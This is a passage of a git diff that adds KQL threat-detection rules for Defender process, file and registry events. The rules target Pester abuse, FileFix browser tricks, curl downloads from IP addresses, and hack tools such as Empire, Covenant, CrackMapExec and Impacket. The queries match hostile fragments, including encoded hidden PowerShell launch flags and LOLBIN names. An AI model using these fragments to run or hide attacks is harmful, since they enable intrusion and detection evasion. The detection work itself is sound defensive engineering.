+DeviceProcessEvents +| where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?")) \ No newline at end of file diff --git a/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql b/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql new file mode 100644 index 00000000..34eb88ed --- /dev/null +++ b/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql @@ -0,0 +1,12 @@ +// Title: Execute Code with Pester.bat as Parent +// Author: frack113, Nasreddine Bencherchali +// Date: 2022-08-20 +// Level: medium +// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 +// False Positives: +// - Legitimate use of Pester for writing tests for Powershell scripts and modules + +DeviceProcessEvents +| where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql b/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql new file mode 100644 index 00000000..4a6dfd1a --- /dev/null +++ b/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql @@ -0,0 +1,12 @@ +// Title: Execution of Powershell Script in Public Folder +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-04-06 +// Level: high +// Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "-f C:\\Users\\Public" or ProcessCommandLine contains "-f \"C:\\Users\\Public" or ProcessCommandLine contains "-f %Public%" or ProcessCommandLine contains "-fi C:\\Users\\Public" or ProcessCommandLine contains "-fi \"C:\\Users\\Public" or ProcessCommandLine contains "-fi %Public%" or ProcessCommandLine contains "-fil C:\\Users\\Public" or ProcessCommandLine contains "-fil \"C:\\Users\\Public" or ProcessCommandLine contains "-fil %Public%" or ProcessCommandLine contains "-file C:\\Users\\Public" or ProcessCommandLine contains "-file \"C:\\Users\\Public" or ProcessCommandLine contains "-file %Public%") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql b/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql new file mode 100644 index 00000000..6134260b --- /dev/null +++ b/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql @@ -0,0 +1,10 @@ +// Title: Execution Of Script Located In Potentially Suspicious Directory +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: medium +// Description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains " -c " and (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and ProcessCommandLine contains "/tmp/" \ No newline at end of file diff --git a/KQL/rules/Execution/file_decryption_using_gpg4win.kql b/KQL/rules/Execution/file_decryption_using_gpg4win.kql new file mode 100644 index 00000000..e39ad38d --- /dev/null +++ b/KQL/rules/Execution/file_decryption_using_gpg4win.kql @@ -0,0 +1,10 @@ +// Title: File Decryption Using Gpg4win +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-09 +// Level: medium +// Description: Detects usage of Gpg4win to decrypt files +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") \ No newline at end of file diff --git a/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql b/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql new file mode 100644 index 00000000..b207198e --- /dev/null +++ b/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql @@ -0,0 +1,10 @@ +// Title: File Download From IP URL Via Curl.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-18 +// Level: medium +// Description: Detects file downloads directly from IP address URL using curl.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}") and (not((ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'"))) \ No newline at end of file diff --git a/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql b/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql new file mode 100644 index 00000000..13bb5065 --- /dev/null +++ b/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql @@ -0,0 +1,10 @@ +// Title: File Encryption/Decryption Via Gpg4win From Suspicious Locations +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2022-11-30 +// Level: high +// Description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains "-passphrase" and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoProductName =~ "GNU Privacy Guard (GnuPG)" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") \ No newline at end of file diff --git a/KQL/rules/Execution/file_encryption_using_gpg4win.kql b/KQL/rules/Execution/file_encryption_using_gpg4win.kql new file mode 100644 index 00000000..0b41139c --- /dev/null +++ b/KQL/rules/Execution/file_encryption_using_gpg4win.kql @@ -0,0 +1,10 @@ +// Title: File Encryption Using Gpg4win +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-09 +// Level: medium +// Description: Detects usage of Gpg4win to encrypt files +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") \ No newline at end of file diff --git a/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql b/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql new file mode 100644 index 00000000..650b7be1 --- /dev/null +++ b/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql @@ -0,0 +1,10 @@ +// Title: File With Uncommon Extension Created By An Office Application +// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the creation of files with an executable or script extension by an Office application. +// MITRE Tactic: Execution +// Tags: attack.t1204.002, attack.execution + +DeviceFileEvents +| where ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".ocx" or FolderPath endswith ".proj" or FolderPath endswith ".ps1" or FolderPath endswith ".scf" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")) and (not((FolderPath contains "\\AppData\\Local\\assembly\\tmp\\" and FolderPath endswith ".dll"))) and (not((((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\BackstageInAppNavCache\\") and FolderPath endswith ".com") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Local\\Temp\\webexdelta\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) or ((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\WebServiceCache\\AllUsers") and FolderPath endswith ".com")))) \ No newline at end of file diff --git a/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql new file mode 100644 index 00000000..2968f382 --- /dev/null +++ b/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql @@ -0,0 +1,10 @@ +// Title: FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse +// Author: Alfie Champion (delivr.to) +// Date: 2025-07-05 +// Level: high +// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004 + +DeviceRegistryEvents +| where (RegistryValueData contains "#" and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "cmd" or RegistryValueData contains "curl" or RegistryValueData contains "powershell" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "mshta" or RegistryValueData contains "regsvr32") \ No newline at end of file diff --git a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql new file mode 100644 index 00000000..3383bd6a --- /dev/null +++ b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql @@ -0,0 +1,15 @@ +// Title: FileFix - Suspicious Child Process from Browser File Upload Abuse +// Author: 0xFustang +// Date: 2025-06-26 +// Level: high +// Description: Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique, +where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar. +The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004 +// False Positives: +// - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools + +DeviceProcessEvents +| where ProcessCommandLine contains "#" and (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/forfiles_command_execution.kql b/KQL/rules/Execution/forfiles_command_execution.kql new file mode 100644 index 00000000..7793cddc --- /dev/null +++ b/KQL/rules/Execution/forfiles_command_execution.kql @@ -0,0 +1,15 @@ +// Title: Forfiles Command Execution +// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2022-06-14 +// Level: medium +// Description: Detects the execution of "forfiles" with the "/c" flag. +While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. +Can be used to bypass application whitelisting. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use via a batch script or by an administrator. + +DeviceProcessEvents +| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and (FolderPath endswith "\\forfiles.exe" or ProcessVersionInfoOriginalFileName =~ "forfiles.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql new file mode 100644 index 00000000..05ba71c1 --- /dev/null +++ b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql @@ -0,0 +1,14 @@ +// Title: Fsutil Behavior Set SymlinkEvaluation +// Author: frack113 +// Date: 2022-03-02 +// Level: medium +// Description: A symbolic link is a type of file that contains a reference to another file. +This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (ProcessCommandLine contains "behavior " and ProcessCommandLine contains "set " and ProcessCommandLine contains "SymlinkEvaluation") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql b/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql new file mode 100644 index 00000000..62765b23 --- /dev/null +++ b/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql @@ -0,0 +1,12 @@ +// Title: GAC DLL Loaded Via Office Applications +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: high +// Description: Detects any GAC DLL being loaded by an Office Product +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Legitimate macro usage. Add the appropriate filter according to your environment + +DeviceImageLoadEvents +| where FolderPath startswith "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql b/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql new file mode 100644 index 00000000..7c1d5929 --- /dev/null +++ b/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Covenant PowerShell Launcher +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2020-06-04 +// Level: high +// Description: Detects suspicious command lines used in Covenant luanchers +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1564.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_crackmapexec_execution.kql b/KQL/rules/Execution/hacktool_crackmapexec_execution.kql new file mode 100644 index 00000000..9892aa5a --- /dev/null +++ b/KQL/rules/Execution/hacktool_crackmapexec_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - CrackMapExec Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-25 +// Level: high +// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.credential-access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201 + +DeviceProcessEvents +| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 ")) \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql b/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql new file mode 100644 index 00000000..074c02c8 --- /dev/null +++ b/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql @@ -0,0 +1,10 @@ +// Title: HackTool - CrackMapExec PowerShell Obfuscation +// Author: Thomas Patzke +// Date: 2020-05-22 +// Level: high +// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027.005 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql b/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql new file mode 100644 index 00000000..04c0865a --- /dev/null +++ b/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Default PowerSploit/Empire Scheduled Task Creation +// Author: Markus Neis, @Karneades +// Date: 2018-03-06 +// Level: high +// Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.g0022, attack.g0060, car.2013-08-001, attack.t1053.005, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "/SC ONLOGON" or ProcessCommandLine contains "/SC DAILY /ST" or ProcessCommandLine contains "/SC ONIDLE" or ProcessCommandLine contains "/SC HOURLY") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "powershell.exe -NonI" and ProcessCommandLine contains "/TN Updater /TR") and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql b/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql new file mode 100644 index 00000000..7ca42abc --- /dev/null +++ b/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Empire PowerShell Launch Parameters +// Author: Florian Roth (Nextron Systems) +// Date: 2019-04-20 +// Level: high +// Description: Detects suspicious powershell command line parameters used in Empire +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Other tools that incidentally use the same command line parameters + +DeviceProcessEvents +| where ProcessCommandLine contains " -NoP -sta -NonI -W Hidden -Enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc " or ProcessCommandLine contains " -NoP -NonI -W Hidden -enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc" or ProcessCommandLine contains " -enc SQB" or ProcessCommandLine contains " -nop -exec bypass -EncodedCommand " \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql b/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql new file mode 100644 index 00000000..a8c8d9fb --- /dev/null +++ b/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Jlaive In-Memory Assembly Execution +// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk) +// Date: 2022-05-24 +// Level: medium +// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 + +DeviceProcessEvents +| where (InitiatingProcessCommandLine endswith ".bat" and InitiatingProcessFolderPath endswith "\\cmd.exe") and (((ProcessCommandLine contains "powershell.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "pwsh.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "+s" and ProcessCommandLine contains "+h" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\attrib.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_koadic_execution.kql b/KQL/rules/Execution/hacktool_koadic_execution.kql new file mode 100644 index 00000000..1cdebca1 --- /dev/null +++ b/KQL/rules/Execution/hacktool_koadic_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Koadic Execution +// Author: wagga, Jonhnathan Ribeiro, oscd.community +// Date: 2020-01-12 +// Level: high +// Description: Detects command line parameters used by Koadic hack tool +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "chcp") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_pchunter_execution.kql b/KQL/rules/Execution/hacktool_pchunter_execution.kql new file mode 100644 index 00000000..766616e0 --- /dev/null +++ b/KQL/rules/Execution/hacktool_pchunter_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - PCHunter Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali +// Date: 2022-10-10 +// Level: high +// Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff +// MITRE Tactic: Execution +// Tags: attack.execution, attack.discovery, attack.t1082, attack.t1057, attack.t1012, attack.t1083, attack.t1007 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((SHA1 startswith "5F1CBC3D99558307BC1250D084FA968521482025" or SHA1 startswith "3FB89787CB97D902780DA080545584D97FB1C2EB") or (MD5 startswith "987B65CD9B9F4E9A1AFD8F8B48CF64A7" or MD5 startswith "228DD0C2E6287547E26FFBD973A40F14") or (SHA256 startswith "2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32" or SHA256 startswith "55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C")) or (FolderPath endswith "\\PCHunter64.exe" or FolderPath endswith "\\PCHunter32.exe") or (ProcessVersionInfoOriginalFileName =~ "PCHunter.exe" or ProcessVersionInfoFileDescription =~ "Epoolsoft Windows Information View Tools") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql b/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql new file mode 100644 index 00000000..3658ad67 --- /dev/null +++ b/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Potential Impacket Lateral Movement Activity +// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch +// Date: 2019-09-03 +// Level: high +// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql b/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql new file mode 100644 index 00000000..5199f9e7 --- /dev/null +++ b/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - RedMimicry Winnti Playbook Execution +// Author: Alexander Rausch +// Date: 2020-06-24 +// Level: high +// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1106, attack.t1059.003, attack.t1218.011 + +DeviceProcessEvents +| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql new file mode 100644 index 00000000..628c8f88 --- /dev/null +++ b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SharpWSUS/WSUSpendu Execution +// Author: @Kostastsale, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-07 +// Level: high +// Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. +Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal 